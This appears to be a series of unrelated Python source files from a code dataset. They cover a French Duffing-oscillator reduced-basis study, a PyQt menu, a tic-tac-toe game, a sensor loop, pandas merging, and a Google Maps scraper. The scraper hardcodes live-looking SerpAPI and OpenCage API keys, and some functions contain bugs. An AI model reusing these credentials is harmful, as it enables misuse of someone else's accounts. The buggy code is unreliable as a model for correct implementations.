print(\"-------------------------------------------------------------------\")\n\n #------------------------ DESCRIPTION DES PARAMETRES -----------------------\n\n #DISCRETISATION TEMPORELLE\n print(\"------------ Conditions initiales ------------------\")\n tmax = 50\n print(\"tmax = \",tmax)\n t = np.arange(0,tmax+1)\n\n #CONDITIONS INITIALES DU SYSTEME\n x0 = 0.\n print(\"x0 = \",x0)\n xdot0 = 0.\n print(\"xdot0 = \", xdot0)\n Z = [x0,xdot0]\n print(\"Vecteur des conditions initiales = \", Z)\n print(\"----------------------------------------------------\")\n\n #PARAMETRES FIXES \"UNE BONNE FOIS POUR TOUTE\"\n print(\"-------- Paramètres définis pour le programme ------\")\n delta = 0.02\n print(\"delta = \", delta)\n beta = 5\n print(\"beta = \", beta)\n omega = 0.5\n print(\"omega = \", omega)\n print(\"----------------------------------------------------\")\n\n #PARAMETRES SUR LESQUELS ON JOUE\n alpha = np.linspace(1,3,21)\n print(\"alpha = \", alpha)\n gamma_1 = 1\n print(\"gamma_1 = \", gamma_1)\n gamma_2 = 3.5\n print(\"gamma_2 = \", gamma_2)\n\n #NOMBRE DE VECTEUR DE LA BASE CONSIDERE\n k = 5\n print(\"Nombre de vecteur de la base = \", k)\n\n #sol = solu_oscillateur(Z,t,delta,beta,omega,1,gamma_1)\n\n #-------------------------- INITIALISATION DES BASES -----------------------\n #PSY_INIT = BASE POUR GAMMA 1\n PSY_INIT = base_gamma(Z,t,delta,beta,omega,alpha,gamma_1)\n #PHI_INIT = BASE POUR GAMMA 2\n PHI_INIT = base_gamma(Z,t,delta,beta,omega,alpha,gamma_2)\n print(\"La taille de PSY_INIT est = \", np.shape(PSY_INIT))\n print(\"La taille de PHI_INIT est = \", np.shape(PHI_INIT))\n\n #------------------------- ON REDUIT ORTHOGONALISE LA BASE -----------------\n print(\"-----------Quelques calculs sur les dimensions ------\")\n\n PSY_ORTHO = orthonormalisation(PSY_INIT,k)\n PHI_ORTHO = orthonormalisation(PHI_INIT,k)\n #PSY_ORTHO = gram_schmidt(PSY_INIT)\n #PHI_ORTHO = gram_schmidt(PHI_INIT)\n print(\"La taille de PSY_ORTHO est = \", np.shape(PSY_ORTHO))\n print(\"La taille de PHI_ORTHO est = \", np.shape(PHI_ORTHO))\n\n #----------------------- FAIRE INTERPOLATION A t = 0.5 AVEC GEODESIQUE ------\n\n INTERPOL = solution_val_lim(PSY_ORTHO,PHI_ORTHO,0.5)\n gamma_mid = (gamma_1 + gamma_2)/2\n print(\"gamma_mid = \", gamma_mid)\n\n #----------------------- ON REGARDE LA SOLUTION GROSSIERE MOYENNE ----------\n\n GROSSIERE = (PHI_INIT + PSY_INIT)/2\n\n #---------------------- CALCUL D'ERREUR SUR LA SOLUTION --------------------\n print(\"-------------------Les calculs d'erreur --------------\")\n\n erreur_PSY = erreur_moy_HF(PSY_ORTHO,Z,t,delta,beta,omega,alpha,gamma_1)\n erreur_PHI = erreur_moy_HF(PHI_ORTHO,Z,t,delta,beta,omega,alpha,gamma_2)\n\n print(\"L'erreur moyenne sur tous les alphas entre la solution exacte et la solution projetée sur la base réduite PSY est, pour gamma_1 : \", erreur_PSY)\n print(\"L'erreur moyenne sur tous les alphas entre la solution exacte et la solution projetée sur la base réduite PHI est, pour gamma_2 : \", erreur_PHI)\n\n erreur_INTERPOL = erreur_moy_HF(INTERPOL,Z,t,delta,beta,omega,alpha,gamma_mid)\n print(\"L'erreur moyenne sur tous les alphas entre la solution exacte et la solution projetée sur la base INTERPOLE est, pour gamma_mid : \", erreur_INTERPOL)\n\n erreur_GROSSIERE = erreur_moy_HF(GROSSIERE,Z,t,delta,beta,omega,alpha,gamma_mid)\n print(\"L'erreur moyenne sur tous les alphas entre la solution exacte et la solution projetée sur la base GROSSIERE est, pour gamma_mid : \", erreur_GROSSIERE)\n\n 
print(\"------------------------------------------------------\")\n\n print(\"-------------------------------------------------------------------\")\n print(\"--------------------- FIN DU PROGRAMME ----------------------------\")\n print(\"-------------------------------------------------------------------\")\n\n return PSY_INIT, PHI_INIT\n\n\n###################################################################################################################################################\n################################################## FONCTIONS POUR LE MAIN #########################################################################\n###################################################################################################################################################\n\n\n#--------------------------- FONCTION VECTEURS DERIVES -------------------------\ndef deriv(Z,t,delta,beta,omega,alpha,gamma):\n dX = Z[1]\n dY = -delta*Z[1] - alpha*Z[0] - beta*(Z[0])**3 + gamma*np.cos(omega*t)\n dZ = [dX,dY]\n return dZ\n#-------------------------------------------------------------------------------\n\n#----------------------------- SOLUTION DE L'EDO -------------------------------\ndef solu_oscillateur(Z,t,delta,beta,omega,alpha,gamma):\n #sol est de taille(N,2) ---> ka ===la premiere colonne est la solution\n #et la seconde sa derivée.\n sol = odeint(deriv, Z, t, args = (delta,beta,omega,alpha,gamma))\n return sol\n#-------------------------------------------------------------------------------\n\n#------------------------------ FONCTION CREATION BASE GAMMA_I -----------------\n\ndef base_gamma(Z,t,delta,beta,omega,alpha,gamma):\n N = np.size(alpha)\n BASE = np.zeros((np.size(t),N))\n for i in range(N):\n SOL = solu_oscillateur(Z,t,delta,beta,omega,alpha[i],gamma)\n BASE[:,i] = SOL[:,0]\n return BASE\n#-------------------------------------------------------------------------------\n\n#----------------------------- AFFICHAGE ---------------------------------------\ndef affichage(t,sol):\n\n fig = plt.figure(figsize = [7,7])\n ax = fig.add_subplot(111)\n ax.plot(sol[:,0], sol[:,1], 'b', label = 'x(t)')\n plt.xlabel(\"t\")\n plt.ylabel(\"x(t)\")\n plt.title(\"Oscillateur de Duffing\")\n\n plt.show()\n#-------------------------------------------------------------------------------\n\n#------------------------ FONCTION DE PROJECTION DE V SUR U --------------------\ndef proj(v,u):\n\n proj = np.dot(v,u)*u\n\n return proj\n#-------------------------------------------------------------------------------\n\n#------------------------- ORTHONORMALISATION SELON SEUIL ----------------------\ndef orthonormalisation(MATRIX, nbr_vect):\n\n N = np.shape(MATRIX)[0]\n k = np.shape(MATRIX)[1]\n\n ortho = []\n norm = []\n indice = []\n x_gamma = MATRIX[:,0]\n e = x_gamma/np.linalg.norm(x_gamma)\n ortho.append(e)\n\n for i in range(1,k):\n v = MATRIX[:,i]\n sum = np.zeros(N)\n\n for i in range(len(ortho)):\n sum += proj(v,ortho[i])\n\n u = v - sum\n norm.append(np.linalg.norm(u))\n e = u/np.linalg.norm(u)\n ortho.append(e)\n\n if nbr_vect > len(norm) + 1:\n print(\"ERREUR, veuillez saisir un nombre moins important de vecteurs de base à conserver\")\n sys.exit()\n else:\n m = 0\n while m < nbr_vect - 1:\n indice.append(norm.index(min(norm)))\n norm[norm.index(min(norm))] = max(norm)\n m = m + 1\n\n ORTHO = np.zeros((N, nbr_vect))\n ORTHO[:, 0] = ortho[0]\n for i in range(len(indice)):\n ORTHO[:, i+1] = ortho[indice[i]+1]\n\n return 
\n#-------------------------------------------------------------------------------\n\n#------------------------- ERROR BETWEEN THE EXACT AND THE PROJECTED SOLUTION ----------\ndef erreur_moy_HF(INIT,Z,t,delta,beta,omega,alpha,gamma):\n\n PROJ = np.dot(INIT,np.transpose(INIT))\n N = np.size(alpha)\n erreur = 0\n for i in range(N):\n SHF = solu_oscillateur(Z,t,delta,beta,omega,alpha[i],gamma)\n SOL = SHF[:,0]\n erreur += np.linalg.norm(SOL - np.dot(PROJ,SOL))\n\n return erreur/N\n\n#-------------------------------------------------------------------------------\n\n###################################################################################################################################################\n################################################## FUNCTIONS FOR GEODESIC INTERPOLATION ##########################################################\n###################################################################################################################################################\n\ndef solution_val_lim(PHI, PSY, t):\n\n U, SIGMA, V_T = svd(PHI, PSY)\n\n V = np.transpose(V_T)\n N = np.shape(SIGMA)[0]\n\n COS_T_SIGMA = np.zeros((N,N))\n SIN_T_SIGMA = np.zeros((N,N))\n\n for i in range(N):\n COS_T_SIGMA[i, i] = np.cos(t*SIGMA[i,i])\n SIN_T_SIGMA[i, i] = np.sin(t*SIGMA[i,i])\n\n #SOLUTION OF THE FORM: GAMMA(t) = GAMMA(0).V.cos(SIGMA*t) + U.sin(SIGMA*t)\n P1 = np.dot(np.dot(PHI,V), COS_T_SIGMA)\n P2 = np.dot(U, SIN_T_SIGMA)\n\n GAMMA_t = P1 + P2\n\n return GAMMA_t\n\n\ndef svd(PHI, PSY):\n\n PHI_PHI_T = np.dot(PHI, np.transpose(PHI))\n N = np.shape(PHI_PHI_T)[0]\n I = np.eye(N)\n PHI_T_PSY = np.dot(np.transpose(PHI) , PSY)\n INV_PHI_T_PSY = np.linalg.inv(PHI_T_PSY)\n\n #BUILD THE MATRIX WHOSE SVD WE TAKE\n POUR_SVD = np.dot( np.dot( I - PHI_PHI_T , PSY ), INV_PHI_T_PSY )\n\n #SVD (NOTE: THE SIGMA RETURNED BY np.linalg.svd IS A VECTOR OF SHAPE (k,))\n U, tnSIGMA, V_T = np.linalg.svd(POUR_SVD, full_matrices = False)\n\n SIGMA = np.arctan(tnSIGMA)\n\n #TURN THE SIGMA VECTOR INTO A (k,k) MATRIX\n SIGMA = np.diag(SIGMA)\n\n return U, SIGMA, V_T\n\n\ndef gram_schmidt(X):\n Q, R = np.linalg.qr(X, mode = 'reduced')\n return Q\n
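\n# --- Added usage sketch (illustrative, not part of the original script): interpolating between two random orthonormal bases. By construction, t=0 spans the same subspace as the first basis and t=1 is intended to reach the subspace of the second one.\ndef _demo_geodesique():\n Q1 = gram_schmidt(np.random.rand(40, 3))\n Q2 = gram_schmidt(np.random.rand(40, 3))\n return solution_val_lim(Q1, Q2, 0.5) # basis halfway along the geodesic\n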
print(f\"{software_name[0]['name']} has new release {rls.tag_name}\", file = log_file)\n discord.content = f\":arrow_right: New realese: **{software_name[0]['name']}** **{rls.tag_name}** at {rls.published_at}\"\n discord.execute()\n else:\n print(\n f\"{repo} has no update. Its current version is {rls.tag_name} released on {rls.published_at}\", file=log_file)\n # discord.content = f\"**{repo}** has no update. Its current version is **{rls.tag_name}** released on {rls.published_at}\"\n # discord.execute()\n log_file.close()\n","repo_name":"thanhleviet/monitor_github_release","sub_path":"monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":1797,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"42940823212","text":"from PyQt5 import QtGui, QtWidgets\r\nfrom fbxConvert import Ui_FbxConverter\r\nfrom skymapConverter import Ui_SkymapConverter\r\nfrom skinConverter import Ui_SkinConverter\r\nfrom texturesConverter import Ui_TexturesConverter\r\nfrom managerPaths import Paths\r\nfrom staticMethods import StaticMethods\r\n\r\nclass Ui_Converters(object):\r\n def __init__(self, win, app):\r\n self.app = app\r\n self.converters = win\r\n self.setupUi(self.converters)\r\n self.converters.show()\r\n\r\n def openWindow(self, ui):\r\n self.win = QtWidgets.QMainWindow()\r\n if ui == Ui_FbxConverter:\r\n Ui_FbxConverter(self.win, self.app)\r\n elif ui == Ui_SkymapConverter:\r\n Ui_SkymapConverter(self.win, self.app)\r\n elif ui == Ui_SkinConverter:\r\n Ui_SkinConverter(self.win, self.app)\r\n elif ui == Ui_TexturesConverter:\r\n Ui_TexturesConverter(self.win, self.app)\r\n\r\n def setupUi(self, converters):\r\n converters.resize(300, 200)\r\n converters.setObjectName('convertersWindow')\r\n converters.setWindowTitle('converters')\r\n\r\n self.centralwidget = QtWidgets.QWidget(converters)\r\n self.centralwidget.setObjectName('centralwidget')\r\n\r\n self.centralLayout = QtWidgets.QGridLayout(self.centralwidget)\r\n self.centralLayout.setObjectName('centralLayout')\r\n self.centralLayout.setContentsMargins(20, 20, 20, 20)\r\n\r\n self.fbxToGlbButton = QtWidgets.QPushButton()\r\n self.fbxToGlbButton.setObjectName('fbxToGlbButton')\r\n self.fbxToGlbButton.setText('FBX to GLB\\nConverter')\r\n font = QtGui.QFont()\r\n font.setFamily(\"Oswald Light\")\r\n font.setPointSize(StaticMethods.setFontSizeCaption(self.app))\r\n self.fbxToGlbButton.setFont(font)\r\n self.fbxToGlbButton.setSizePolicy(QtWidgets.QSizePolicy.Policy.Expanding,\r\n QtWidgets.QSizePolicy.Policy.Expanding)\r\n self.fbxToGlbButton.clicked.connect(lambda: self.openWindow(Ui_FbxConverter))\r\n self.centralLayout.addWidget(self.fbxToGlbButton, 0, 0)\r\n\r\n self.skymapButton = QtWidgets.QPushButton()\r\n self.skymapButton.setObjectName('skymapButton')\r\n self.skymapButton.setText('Skymap\\nConverter')\r\n font = QtGui.QFont()\r\n font.setFamily(\"Oswald Light\")\r\n font.setPointSize(StaticMethods.setFontSizeCaption(self.app))\r\n self.skymapButton.setFont(font)\r\n self.skymapButton.setSizePolicy(QtWidgets.QSizePolicy.Policy.Expanding,\r\n QtWidgets.QSizePolicy.Policy.Expanding)\r\n self.skymapButton.clicked.connect(lambda: self.openWindow(Ui_SkymapConverter))\r\n self.centralLayout.addWidget(self.skymapButton, 0, 1)\r\n\r\n self.skinButton = QtWidgets.QPushButton()\r\n self.skinButton.setObjectName('skinButton')\r\n self.skinButton.setText('Skin\\nConverter')\r\n font = QtGui.QFont()\r\n font.setFamily(\"Oswald Light\")\r\n 
 font.setPointSize(StaticMethods.setFontSizeCaption(self.app))\r\n self.skinButton.setFont(font)\r\n self.skinButton.setSizePolicy(QtWidgets.QSizePolicy.Policy.Expanding,\r\n QtWidgets.QSizePolicy.Policy.Expanding)\r\n self.skinButton.clicked.connect(lambda: self.openWindow(Ui_SkinConverter))\r\n self.centralLayout.addWidget(self.skinButton, 1, 0)\r\n\r\n self.texturesButton = QtWidgets.QPushButton()\r\n self.texturesButton.setObjectName('texturesButton')\r\n self.texturesButton.setText('Textures\\nConverter')\r\n font = QtGui.QFont()\r\n font.setFamily(\"Oswald Light\")\r\n font.setPointSize(StaticMethods.setFontSizeCaption(self.app))\r\n self.texturesButton.setFont(font)\r\n self.texturesButton.setSizePolicy(QtWidgets.QSizePolicy.Policy.Expanding,\r\n QtWidgets.QSizePolicy.Policy.Expanding)\r\n self.texturesButton.clicked.connect(lambda: self.openWindow(Ui_TexturesConverter))\r\n self.centralLayout.addWidget(self.texturesButton, 1, 1)\r\n\r\n self.centralwidget.setLayout(self.centralLayout)\r\n\r\n\r\n converters.setCentralWidget(self.centralwidget)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n import sys\r\n app = QtWidgets.QApplication(sys.argv)\r\n win = QtWidgets.QMainWindow()\r\n Paths.getDir('Release')\r\n Ui_Converters(win, app) # __init__ also needs the app; it was missing here\r\n win.show()\r\n sys.exit(app.exec_())","repo_name":"AntonElkin1996/assets_manager","sub_path":"converters.py","file_name":"converters.py","file_ext":"py","file_size_in_byte":4431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"18576551772","text":"import re\nimport requests\n\ndef get_serp_results(request):\n # Serp API endpoint and parameters\n api_key = 'ab5c8496b40ee68d2b887dc8587cdb62b0f538ad87b479ae1374280242ef084c'\n query = request.GET.get('q', '') # Get the query entered by the user\n search_engine = 'google_maps'\n num_results = 30 # Number of results to retrieve\n\n # Extract the number and location from the query using regular expressions\n number_match = re.search(r'\\b(\\d+)\\b', query)\n location_match = re.search(r'in\\s+([^,]+)', query)\n\n number = int(number_match.group(1)) if number_match else num_results\n location = location_match.group(1).strip() if location_match else '' # Default location if not specified\n\n map_results = [] # List to store all the results\n\n # Perform pagination to retrieve the desired number of results\n start = 0\n while number > 0:\n # Adjust the start value to be a multiple of 20\n start = (start // 20) * 20\n\n # Calculate the number of results to request for this iteration\n results_per_page = min(number, 20)\n\n # Create the API URL with the updated start value and number of results\n url = f\"https://serpapi.com/search.json?engine={search_engine}&q={query}&location={location}&start={start}&num={results_per_page}&api_key={api_key}\"\n print(url)\n try:\n response = requests.get(url)\n data = response.json()\n # Extract the local results from the response\n local_results = data.get('local_results', [])\n\n # Append the local results to the main results list\n map_results.extend(local_results)\n except requests.RequestException as e:\n # Handle request exception\n map_results = []\n break\n\n number -= results_per_page\n start += results_per_page\n\n return map_results\n\n\n\n\n\n\n\n# somewhat working approach to load multiple results (note: this second definition shadows the first get_serp_results above)\ndef get_serp_results(request):\n\n # Serp API endpoint and parameters\n global map_results\n map_results = []\n start = 0\n api_key = '002ae278dd8df72fa9a4125af4e40c9c5fcc96cae780f08de4a1d48b5d3fac86'\n
 # '91039cff9059ebf9f60e7189fe10ac358d028eacb52e4bde52831b17a2314f77' - zep.peg\n query = request.GET.get('q', '')\n search_engine = 'google_maps'\n num_results = 20\n\n number_match = re.search(r'\\b(\\d+)\\b', query)\n location_match = re.search(r'in\\s+([^,]+)', query)\n\n number = int(number_match.group(1)) if number_match else num_results\n location = location_match.group(1).strip() if location_match else '' # Default location if not specified\n\n # OpenCage geocoding API parameters\n q = location\n key = 'be3984f8e5a042abbf6af3a3a8d5c604'\n geo_url = f\"https://api.opencagedata.com/geocode/v1/json?q={q}&key={key}&language=en\"\n try:\n response_geo = requests.get(geo_url)\n data_geo = response_geo.json()\n lat = data_geo[\"results\"][0][\"geometry\"][\"lat\"]\n lng = data_geo[\"results\"][0][\"geometry\"][\"lng\"]\n ll = f\"@{lat},{lng},20z\"\n except requests.RequestException as e:\n # Handle request exception; fall back to an empty location bias so the url f-string below cannot raise a NameError\n data_geo = None\n ll = ''\n\n # url = f\"https://serpapi.com/search.json?engine={search_engine}&q={query}&api_key={api_key}\"\n while len(map_results) < number:\n remaining_results = number - len(map_results) # Calculate the remaining number of results needed\n batch_size = min(20, remaining_results)\n url = f\"https://serpapi.com/search.json?engine={search_engine}&q={query}&api_key={api_key}&start={start}&ll={ll}\"\n try:\n response = requests.get(url)\n data = response.json()\n batch_results = data.get('local_results', [])\n map_results.extend(batch_results)\n start += batch_size\n except requests.RequestException as e:\n break\n\n map_results = map_results[:number]\n return map_results","repo_name":"IshanPatle/pyScrapper","sub_path":"scrapper/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"12077049096","text":"import pygame;\nfrom sys import exit\npygame.init();\n\nscreen = pygame.display.set_mode((700, 400));\nscreen.fill(\"#1F2026\")\nclock = pygame.time.Clock();\nFPS = 60;\nturn = \"x\";\ngameWon = False;\nwhoWon = \"\";\ndraw = False;\npieces = 0;\nwonLinePos = [(0,0),(700,400)]\n\ngame = [\n [\"\", \"\", \"\"], \n [\"\", \"\", \"\"],\n [\"\" ,\"\", \"\"]\n]\ndef DrawWireFrame():\n global screen;\n thickness = 16\n color = \"#3A3A3A\"\n pygame.draw.line(screen, color, (250,50), (250, 350), thickness);\n pygame.draw.line(screen, color, (150,50), (150, 350), thickness);\n pygame.draw.line(screen, color, (50,150), (350, 150), thickness);\n pygame.draw.line(screen, color, (50,250), (350, 250), thickness);\n\ndef CreateIcon(pos):\n global symbol, turn, game, pieces; \n gameIndex = (int(pos[0]/100),int(pos[1]/100))\n print(turn);\n\n if(gameWon == True or draw == True): return;\n if(game[gameIndex[0] - 1][gameIndex[1] - 1] == \"\"):\n pieces += 1;\n game[gameIndex[0] - 1][gameIndex[1] - 1] = turn;\n symbol.add(Symbol(pos, turn));\n\n CheckGame();\n if(turn == \"x\"): turn = \"0\";\n else: turn = \"x\";\n print(game);\n\ndef CheckGame():\n global game, turn, gameWon, whoWon, draw;\n gameWon = False;\n won = False;\n\n # Check Vertical\n for i in range(3):\n if((game[i][0] == game[i][1] == game[i][2]) and game[i][0]!=\"\"):\n print(f\"x = {i}\")\n wonLinePos[0] = ((i+1) * 100, 1 *100);\n wonLinePos[1] = ((i+1) * 100, 3*100);\n won = True;\n \n #Check Horizontal\n for i in range(3):\n if((game[0][i] == game[1][i] == game[2][i]) and game[0][i]!=\"\"):\n wonLinePos[0] = (1 * 100, (i+1) * 100);\n wonLinePos[1] = (3 * 100, (i+1) * 100);\n won = True;\n\n
 # Check Diagonal \n if(game[0][0] == turn and game[1][1] == turn and game[2][2] == turn):\n won = True\n wonLinePos[0] = (1 * 100, 1 * 100);\n wonLinePos[1] = (3 * 100, 3 * 100);\n elif(game[0][2] == turn and game[1][1] == turn and game[2][0] == turn):\n wonLinePos[0] = (3 * 100, 1 * 100);\n wonLinePos[1] = (1 * 100, 3 * 100);\n won = True;\n\n if(won == True):\n gameWon = True;\n whoWon = turn;\n return;\n\n # Check Draw\n if(pieces == 9): \n draw = True;\n return;\n return False\n\nclass Text(pygame.sprite.Sprite):\n def __init__(self, text, size, pos, fontfamily = \"pixel.ttf\"):\n super().__init__();\n self.font = pygame.font.Font(f\"Assets/{fontfamily}\", size);\n self.image = self.font.render(text, False, \"#757575\");\n self.rect = self.image.get_rect(center = pos);\n\nclass RectButton(pygame.sprite.Sprite):\n def __init__(self,pos,callback):\n super().__init__();\n # self.size = pygame.Rect(());;\n # self.image = pygame.draw.rect(screen, \"red\", self.size);\n self.image = pygame.image.load(\"Assets/square.png\");\n self.image.fill(\"#1F2026\")\n self.pos = pos;\n self.rect = self.image.get_rect(center = self.pos);\n self.callback = callback\n\n def update(self, events):\n for event in events:\n if(event.type == pygame.MOUSEBUTTONUP):\n if(self.rect.collidepoint(event.pos)):\n self.callback(self.pos);\n\nclass Symbol(pygame.sprite.Sprite):\n def __init__(self, pos, type):\n super().__init__();\n\n self.font = pygame.font.Font(f\"Assets/pixel.ttf\", 96);\n if(type == \"x\"):\n self.image = self.font.render(\"X\", False, \"#757575\");\n else: self.image = self.font.render(\"O\", False, \"#757575\");\n self.rect = self.image.get_rect(center = pos);\n\nbutton = pygame.sprite.Group();\n\n# DRAW BUTTONS\nbutton.add(RectButton((100,100), CreateIcon));\nbutton.add(RectButton((100,200), CreateIcon));\nbutton.add(RectButton((100,300), CreateIcon));\n\nbutton.add(RectButton((200,100), CreateIcon));\nbutton.add(RectButton((200,300), CreateIcon));\nbutton.add(RectButton((200,200), CreateIcon));\n\nbutton.add(RectButton((300,100), CreateIcon));\nbutton.add(RectButton((300,300), CreateIcon));\nbutton.add(RectButton((300,200), CreateIcon));\n\n\nsymbol = pygame.sprite.Group();\n\n\ntext = pygame.sprite.Group();\nwhile True:\n events = pygame.event.get();\n for event in events:\n if(event.type == pygame.QUIT):\n pygame.quit();\n exit();\n if(event.type == pygame.KEYDOWN):\n if(event.key == pygame.K_r):\n gameWon = False;\n draw = False;\n game = [\n [\"\", \"\", \"\"], \n [\"\", \"\", \"\"],\n [\"\" ,\"\", \"\"]\n ];\n symbol.empty();\n pieces = 0;\n whoWon = \"\"\n turn = \"x\"\n text.empty();\n screen.fill(\"#1F2026\")\n \n button.draw(screen);\n button.update(events);\n\n symbol.draw(screen);\n symbol.update();\n \n text.add(Text(\"Tic Tac Toe\", 64, (530,100)))\n DrawWireFrame();\n if(gameWon == True or draw == True):\n if (draw == True): \n text.add(Text(\"Draw\", 64, (530,200)));\n elif(gameWon == True):\n pygame.draw.line(screen, \"#eeeeee\", wonLinePos[0], wonLinePos[1], 20)\n text.add(Text(f\"{whoWon} won\", 64, (530,200)));\n text.draw(screen);\n \n\n pygame.display.update();","repo_name":"h3nrey/TicTacToePy","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"69861131308","text":"from sys import*\ninput = stdin.readline\nn,m,x,y,k=map(int,input().split())\na=[];dice=[0]*6\ndd=[(0,0),(0,1),(0,-1),(-1,0),(1,0)] # directions 1..4 are R, L, U, D\ndirect = [[0], # face-index permutations when face 0 is fixed as the bottom and face 5 as the top\n [2, 1, 5, 0, 4, 3],\n [3, 1, 0, 5, 4, 2],\n [1, 5, 2, 3, 0, 4],\n [4, 0, 2, 3, 5, 1]]\nfor i in range(n):\n a.append(list(map(int,input().split())))\nmove = list(map(int,input().split()))\n\n# face 0 is the bottom, face 5 the top\ntemp=[0]*6\nfor d in move:\n dx, dy = dd[d]\n nx, ny = x+dx, y+dy\n if nx<0 or ny<0 or nx>n-1 or ny>m-1: continue\n for i in range(6):\n temp[i] = dice[direct[d][i]]\n for i in range(6):\n dice[i] = temp[i]\n if a[nx][ny]:\n dice[0] = a[nx][ny]\n a[nx][ny] = 0\n else:\n a[nx][ny] = dice[0]\n x, y = nx, ny\n print(dice[5])\n","repo_name":"alb7979s/boj","sub_path":"삼성기출/14499_주사위굴리기.py","file_name":"14499_주사위굴리기.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"21456608346","text":"from gpiozero import MotionSensor, Device\nfrom signal import pause\nimport time\n\npir_1 = MotionSensor(23, sample_rate=10, queue_len=40,threshold=0.2)\npir_2 = MotionSensor(24, sample_rate=10, queue_len=40,threshold=0.2)\n\n# pir.when_motion = lambda: print(\"Motion detected!\")\n# pir.when_no_motion = lambda: print(\"All is quiet...\")\n\nwhile True:\n if pir_1.motion_detected:\n print(\"pir_1 detected!\")\n\n elif pir_2.motion_detected:\n print(\"pir_2 detected!\")\n else:\n print(\"_________________\")\n # time.sleep(1)\n\npause()\n\n\n","repo_name":"here-and-now/homepi","sub_path":"pir.py","file_name":"pir.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"13199222881","text":"import pandas as pd\r\nimport numpy as np\r\nDRollout=pd.read_excel(r\"C:\\Users\\UAKHPAL\\OneDrive - BUNGE\\Desktop\\DBMS mapping darta\\Daily Rollout Working files\\Rollout_Status.xlsx\",sheet_name='Rollout data')\r\nDRollout['Date'] = pd.to_datetime(DRollout['Date'])\r\nDRollout['Date']=DRollout['Date'].dt.strftime('%m/%d/%y')\r\nCon_dms=pd.read_excel(r\"C:\\Users\\UAKHPAL\\OneDrive - BUNGE\\Desktop\\DBMS mapping darta\\Daily Rollout Working files\\Total_Rollout_Status.xlsx\",sheet_name='Rollout data')\r\nCon_dms1=pd.merge(DRollout,Con_dms,left_on='Code',right_on='Distributor SAP Code',how='left')\r\nCon_dms1['Distributor SAP Code']=Con_dms1['Distributor SAP Code'].fillna(0)\r\nCon_dms1=Con_dms1[Con_dms1['Distributor SAP Code']==0]\r\nCon_dms1=Con_dms1[['Code','Division',\"Distributor's Name\",'Status','Remarks','Date']]\r\nCon_dms1['Date1']=Con_dms1['Date']\r\nCon_dms1=Con_dms1.rename(columns={'Code':'Distributor SAP Code','Division':'Biz (B2B or B2C)',\"Distributor's Name\":'Distributors Name','Status':'Current status','Date':'Installation Start','Remarks':'Daily Status','Date1':'Date Daily Status'})\r\nCon_dms2=pd.concat([Con_dms,Con_dms1],axis=0)\r\nak1=DRollout[['Code','Status']]\r\nak1=ak1.rename(columns={'Code':'Distributor SAP Code','Status':'Current status'})\r\nak3=pd.merge(Con_dms2,ak1,left_on='Distributor SAP Code',right_on='Distributor SAP Code',how='left')\r\nak3['Current status_y']=ak3['Current status_y'].fillna(0)\r\nak31=ak3[ak3['Current status_y']==0]\r\nak32=ak3[ak3['Current status_y']!=0]\r\nak32=ak32.rename(columns={'Current status_y':'Current status'})\r\nak31=ak31.rename(columns={'Current status_x':'Current status'})\r\nak31=ak31[['Biz (B2B or B2C)','Distributor SAP Code','Distributors Name','Installation Start','Installation End','Current 
status','Date Daily Status','Daily Status']]\r\nak32=ak32[['Biz (B2B or B2C)','Distributor SAP Code','Distributors Name','Installation Start','Installation End','Current status','Date Daily Status','Daily Status']]\r\nak3=pd.concat([ak32,ak31],axis=0)\r\nak3['Current status']=ak3['Current status'].replace({'Done':'Complete'})\r\nak4=DRollout[['Code','Date']]\r\nak4=ak4.rename(columns={'Code':'Distributor SAP Code','Date':'Installation End'})\r\nak5=ak3[ak3['Current status']=='Complete']\r\nak6=pd.merge(ak5,ak4,left_on='Distributor SAP Code',right_on='Distributor SAP Code',how='left')\r\nak6['Installation End_y']=ak6['Installation End_y'].fillna(0)\r\nak61=ak6[ak6['Installation End_y']==0]\r\nak62=ak6[ak6['Installation End_y']!=0]\r\nak62=ak62.rename(columns={'Installation End_y':'Installation End'})\r\nak61=ak61.rename(columns={'Installation End_x':'Installation End'})\r\nak61=ak61[['Biz (B2B or B2C)','Distributor SAP Code','Distributors Name','Installation Start','Installation End','Current status']]\r\nak62=ak62[['Biz (B2B or B2C)','Distributor SAP Code','Distributors Name','Installation Start','Installation End','Current status']]\r\nak6=pd.concat([ak62,ak61],axis=0)\r\nak6['Date Daily Status']=\"\"\r\nak6['Daily Status']=\"\"\r\nak7=ak3[ak3['Current status']!='Complete']\r\nak8=DRollout[['Code','Date','Remarks']]\r\nak8=ak8.rename(columns={'Code':'Distributor SAP Code','Date':'Date Daily Status','Remarks':'Daily Status'})\r\nak9=pd.merge(ak7,ak8,left_on='Distributor SAP Code',right_on='Distributor SAP Code',how='left')\r\nak9['Date Daily Status_y']=ak9['Date Daily Status_y'].fillna(0)\r\nak91=ak9[ak9['Date Daily Status_y']==0]\r\nak92=ak9[ak9['Date Daily Status_y']!=0]\r\nak92=ak92.rename(columns={'Date Daily Status_y':'Date Daily Status','Daily Status_y':'Daily Status'})\r\nak91=ak91.rename(columns={'Date Daily Status_x':'Date Daily Status','Daily Status_x':'Daily Status'})\r\nak91=ak91[['Biz (B2B or B2C)','Distributor SAP Code','Distributors Name','Installation Start','Installation End','Current status','Date Daily Status','Daily Status']]\r\nak92=ak92[['Biz (B2B or B2C)','Distributor SAP Code','Distributors Name','Installation Start','Installation End','Current status','Date Daily Status','Daily Status']]\r\nak9=pd.concat([ak92,ak91],axis=0)\r\nak10=pd.concat([ak6,ak9],axis=0)\r\nak10['Installation Start'] =pd.to_datetime(ak10['Installation Start'])\r\nak10=ak10.rename(columns={'Distributor Name':'Distributors Name'})\r\nak10.sort_values(by=['Distributor SAP 